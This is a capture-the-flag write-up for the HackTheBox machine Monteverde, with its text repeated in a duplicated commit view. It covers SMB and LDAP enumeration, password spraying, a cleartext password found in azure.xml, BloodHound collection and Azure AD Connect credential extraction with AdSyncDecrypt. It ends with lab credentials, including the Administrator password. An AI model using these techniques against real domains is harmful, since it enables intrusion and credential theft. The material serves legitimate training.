CTF-Writeups/HackTheBox/Monteverde.md

# HackTheBox - Monteverde

## NMAP

```bash
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version                                                          
|_    bind   
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-12-11 11:29:48Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?                                              
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped                                             
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped                                             
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                   
|_http-title: Not Found                                                
9389/tcp  open  mc-nmf        .NET Message Framing                
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
59490/tcp open  msrpc         Microsoft Windows RPC
Host script results:
|_clock-skew: -1s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-12-11T11:32:09
|_  start_date: N/A

NSE: Script Post-scanning.
```

From the nmap scan we can see that port 88 is open which is used by kerberos so this machine is an active directory machine

## PORT 139/445 (SMB)

We can try to see if we can login to smb share through unauthenticated  user

<img src="https://i.imgur.com/uLMLvqY.png"/>

We were logged in but don't see any share so moving on , we can try to use `enum4linux` or `windapsearch` which can enumerate users from `LDAP` queries, from the nmap scan we can find the domain name which is `MEGABANK.local` so put that in `/etc/hosts` file

<img src="https://i.imgur.com/ascUJe4.png"/>

This will list service accounts and domain users, let's try doing it with enum4linux-ng

<img src="https://i.imgur.com/AovizRf.png"/>

Now this tool provides us better results so I'll go with this and note the usernames in a text file 

<img src="https://i.imgur.com/JLz21lM.png"/>

<img src="https://i.imgur.com/uwyRAg7.png"/>'

Next I tried to see which users have pre-authentication disabled on them so I can get a hash of the user account

```bash
python3 GetNPUsers.py -dc-ip 10.10.10.172 MEGABANK.local/arz -usersfile ~/Notes/CTFs/HTB/Medium/Monteverde/users.txt
```

<img src="https://i.imgur.com/ExajSLn.png"/>

But we didn't had any luck doing AS-REP roasting , next we could try some common passowrds and brute force it against smb , I created a list of common passwords

```
12345678
admin
dgalanos
roleary
smorgan
password
password123
Password
Password123
1234567
```

<img src="https://i.imgur.com/mxUfCRV.png"/>

But it didn't work , so I tried to use the usernames as a password list

<img src="https://i.imgur.com/88g93wf.png"/>

And this found as a valid username and password for smb , so I tried it on winrm to see if I can get a shell and sadly they weren't valid for winrm

<img src="https://i.imgur.com/7DDNerC.png"/>

<img src="https://i.imgur.com/cAS3Z7A.png"/>

We have read access to `azure_uploads` but it was emtpy

<img src="https://i.imgur.com/GdqKo7l.png"/>

## Foothold

Checking the `users$` share we see a `azure.xml` file in `mhope` 's directory

<img src="https://i.imgur.com/fthQiHp.png"/>

On reading the xml we can find a clear text password

<img src="https://i.imgur.com/09tY5r0.png"/>

So let's run crackmapexec again to see if we got the correct password

<img src="https://i.imgur.com/bx9HE1a.png"/>

Using `evil-winrm` we can use that to login over winrm , after logging in we can see that this user is in `Azure Admins` group

<img src="https://i.imgur.com/ZiXIvSO.png"/>

Upload `Sharphound.ps1` file which is used for collecting information of AD and then using that info we can enumerate the AD using `bloodhound`

<img src="https://i.imgur.com/IO39L01.png"/>

```powershell
Invoke-Bloodhound -CollectionMethod All -Domain MEGABANK.local -ZipFileName loot.zip
```

<img src="https://i.imgur.com/hcYJRf3.png"/>

We can download this archive file by using evil-winrm's download function in which we have to provide absolute path of the file

<img src="https://i.imgur.com/euT3S5F.png"/>

Now let's launch `neo4j console` and `bloodhound` , import the json files that you get after extracting the archive

<img src="https://i.imgur.com/s4wygU1.png"/>

Running any one of the built-in queries to see if data is actually loaded

<img src="https://i.imgur.com/pW0YTB0.png"/>

But here I didn't find anything that would help me escalate privileges

<img src="https://i.imgur.com/eRY82TY.png"/>

## Privilege Escalation

Now remeber that we saw mhope was in Azure admins group so maybe we have to abuse that ,searching of Azure AD related exploit I found an article which would exploit the database and give us the plaintext password 

<img src="https://i.imgur.com/BwbZJTG.png"/>

Download the executable for this exploit from here

https://github.com/VbScrub/AdSyncDecrypt/releases

<img src="https://i.imgur.com/jdBsHAp.png"/>

And now uploading the exe and the dll file , in order to run this we need to be in this location `C:\Program Files\Microsoft Azure AD Sync\Bin` and from here execute the exe (doesn't matter where we upload it)

<img src="https://i.imgur.com/EANqNET.png"/>

<img src="https://i.imgur.com/64O8bgU.png"/>

This gives us the adminstrator's password 

<img src="https://i.imgur.com/oZk1HoM.png"/>

We can then further extract user hashes

<img src="https://i.imgur.com/HJAqL8C.png"/>


## References

https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/


```
SABatchJobs:SABatchJobs


smbclient -U 'SABatchJobs'  \\\\10.10.10.172\\azure_uploads
smbclient -U SABatchJobs -L  \\\\10.10.10.172\
```

Administrator:d0m@in4dminyeah!
Add files via upload 2021-12-11 15:23:56 +00:00			`# HackTheBox - Monteverde`

			`## NMAP`

			```bash
			`PORT STATE SERVICE VERSION`
			`53/tcp open domain?`
			`\| fingerprint-strings:`
			`\| DNSVersionBindReqTCP:`
			`\| version`
			`\|_ bind`
			`88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-12-11 11:29:48Z)`
			`135/tcp open msrpc Microsoft Windows RPC`
			`139/tcp open netbios-ssn Microsoft Windows netbios-ssn`
			`389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)`
			`445/tcp open microsoft-ds?`
			`464/tcp open kpasswd5?`
			`593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0`
			`636/tcp open tcpwrapped`
			`3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)`
			`3269/tcp open tcpwrapped`
			`5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)`
			`\|_http-server-header: Microsoft-HTTPAPI/2.0`
			`\|_http-title: Not Found`
			`9389/tcp open mc-nmf .NET Message Framing`
			`49667/tcp open msrpc Microsoft Windows RPC`
			`49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0`
			`49674/tcp open msrpc Microsoft Windows RPC`
			`49676/tcp open msrpc Microsoft Windows RPC`
			`49696/tcp open msrpc Microsoft Windows RPC`
			`59490/tcp open msrpc Microsoft Windows RPC`
			`Host script results:`
			`\|_clock-skew: -1s`
			`\| smb2-security-mode:`
			`\| 2.02:`
			`\|_ Message signing enabled and required`
			`\| smb2-time:`
			`\| date: 2021-12-11T11:32:09`
			`\|_ start_date: N/A`

			`NSE: Script Post-scanning.`
			```

			`From the nmap scan we can see that port 88 is open which is used by kerberos so this machine is an active directory machine`

			`## PORT 139/445 (SMB)`

			`We can try to see if we can login to smb share through unauthenticated user`

			`<img src="https://i.imgur.com/uLMLvqY.png"/>`

			We were logged in but don't see any share so moving on , we can try to use `enum4linux` or `windapsearch` which can enumerate users from `LDAP` queries, from the nmap scan we can find the domain name which is `MEGABANK.local` so put that in `/etc/hosts` file

			`<img src="https://i.imgur.com/ascUJe4.png"/>`

			`This will list service accounts and domain users, let's try doing it with enum4linux-ng`

			`<img src="https://i.imgur.com/AovizRf.png"/>`

			`Now this tool provides us better results so I'll go with this and note the usernames in a text file`

			`<img src="https://i.imgur.com/JLz21lM.png"/>`

			`<img src="https://i.imgur.com/uwyRAg7.png"/>'`

			`Next I tried to see which users have pre-authentication disabled on them so I can get a hash of the user account`

			```bash
			`python3 GetNPUsers.py -dc-ip 10.10.10.172 MEGABANK.local/arz -usersfile ~/Notes/CTFs/HTB/Medium/Monteverde/users.txt`
			```

			`<img src="https://i.imgur.com/ExajSLn.png"/>`

			`But we didn't had any luck doing AS-REP roasting , next we could try some common passowrds and brute force it against smb , I created a list of common passwords`

			```
			`12345678`
			`admin`
			`dgalanos`
			`roleary`
			`smorgan`
			`password`
			`password123`
			`Password`
			`Password123`
			`1234567`
			```

			`<img src="https://i.imgur.com/mxUfCRV.png"/>`

			`But it didn't work , so I tried to use the usernames as a password list`

			`<img src="https://i.imgur.com/88g93wf.png"/>`

			`And this found as a valid username and password for smb , so I tried it on winrm to see if I can get a shell and sadly they weren't valid for winrm`

			`<img src="https://i.imgur.com/7DDNerC.png"/>`

			`<img src="https://i.imgur.com/cAS3Z7A.png"/>`

			We have read access to `azure_uploads` but it was emtpy

			`<img src="https://i.imgur.com/GdqKo7l.png"/>`

			`## Foothold`

			Checking the `users$` share we see a `azure.xml` file in `mhope` 's directory

			`<img src="https://i.imgur.com/fthQiHp.png"/>`

			`On reading the xml we can find a clear text password`

			`<img src="https://i.imgur.com/09tY5r0.png"/>`

			`So let's run crackmapexec again to see if we got the correct password`

			`<img src="https://i.imgur.com/bx9HE1a.png"/>`

			Using `evil-winrm` we can use that to login over winrm , after logging in we can see that this user is in `Azure Admins` group

			`<img src="https://i.imgur.com/ZiXIvSO.png"/>`

			Upload `Sharphound.ps1` file which is used for collecting information of AD and then using that info we can enumerate the AD using `bloodhound`

			`<img src="https://i.imgur.com/IO39L01.png"/>`

			```powershell
			`Invoke-Bloodhound -CollectionMethod All -Domain MEGABANK.local -ZipFileName loot.zip`
			```

			`<img src="https://i.imgur.com/hcYJRf3.png"/>`

			`We can download this archive file by using evil-winrm's download function in which we have to provide absolute path of the file`

			`<img src="https://i.imgur.com/euT3S5F.png"/>`

			Now let's launch `neo4j console` and `bloodhound` , import the json files that you get after extracting the archive

			`<img src="https://i.imgur.com/s4wygU1.png"/>`

			`Running any one of the built-in queries to see if data is actually loaded`

			`<img src="https://i.imgur.com/pW0YTB0.png"/>`

			`But here I didn't find anything that would help me escalate privileges`

			`<img src="https://i.imgur.com/eRY82TY.png"/>`

			`## Privilege Escalation`

			`Now remeber that we saw mhope was in Azure admins group so maybe we have to abuse that ,searching of Azure AD related exploit I found an article which would exploit the database and give us the plaintext password`

			`<img src="https://i.imgur.com/BwbZJTG.png"/>`

			`Download the executable for this exploit from here`

			`https://github.com/VbScrub/AdSyncDecrypt/releases`

			`<img src="https://i.imgur.com/jdBsHAp.png"/>`

			And now uploading the exe and the dll file , in order to run this we need to be in this location `C:\Program Files\Microsoft Azure AD Sync\Bin` and from here execute the exe (doesn't matter where we upload it)

			`<img src="https://i.imgur.com/EANqNET.png"/>`

			`<img src="https://i.imgur.com/64O8bgU.png"/>`

			`This gives us the adminstrator's password`

			`<img src="https://i.imgur.com/oZk1HoM.png"/>`

			`We can then further extract user hashes`

			`<img src="https://i.imgur.com/HJAqL8C.png"/>`


			`## References`

			`https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/`


			```
			`SABatchJobs:SABatchJobs`


			`smbclient -U 'SABatchJobs' \\\\10.10.10.172\\azure_uploads`
			`smbclient -U SABatchJobs -L \\\\10.10.10.172\`
			```

			`Administrator:d0m@in4dminyeah!`